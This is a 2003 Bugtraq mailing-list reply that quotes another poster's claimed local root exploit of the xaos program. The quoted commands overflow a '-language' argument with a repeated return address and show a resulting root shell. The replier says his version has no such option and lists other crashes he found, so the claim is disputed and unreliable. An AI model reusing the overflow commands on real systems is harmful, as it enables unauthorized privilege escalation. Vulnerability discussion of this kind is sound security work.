[30372] in bugtraq
Re: BAZARR LOCAL ROOT AGAIN. HI GUYS. DONT READ THIS
daemon@ATHENA.MIT.EDU (Benjamin A. Okopnik)
Fri Jun 6 14:13:54 2003
Date: Fri, 6 Jun 2003 12:56:15 -0400
From: "Benjamin A. Okopnik" <ben@callahans.org>
To: "bazarr@ziplip.com" <bazarr@ziplip.com>
Message-ID: <20030606165615.GG5467@callahans.org>
Mail-Followup-To: "Benjamin A. Okopnik" <ben@callahans.org>,
"bazarr@ziplip.com" <bazarr@ziplip.com>, bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <GNPTJTEBDYMHAAKPLXEEIGNVGJHULZFQDTDXCJN0@ziplip.com>
On Thu, Jun 05, 2003 at 03:27:23PM -0700, bazarr@ziplip.com wrote:
[ snipping for context ]
> c00l@debian:~/code/dump% /usr/bin/xaos -language `perl -e 'print "A"x20049'`
> Segmentation fault
>
> [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AA
> Segmentation fault
> [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AAA
> Segmentation fault
> [c00l:dump]$ /usr/bin/xaos -language `perl -e 'print "\x45\xfe\xff\xbf"x8096'` -display AAAA
> sh-2.05a# id ; uname -a
> uid=1001(c00l) gid=1001(c00l) euid=0(root) groups=1001(c00l)
My version of "xaos" (v3.1, Debian "unstable") does not have a
"-language" option, and the above will simply generate the "help text"
(the list of available options.) It does, however, segfault on the the
"-nogui" option and the "-render" option when a non-existent file name
is given as an argument.
Ben Okopnik
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No problem is so formidable that you can't just walk away from it.
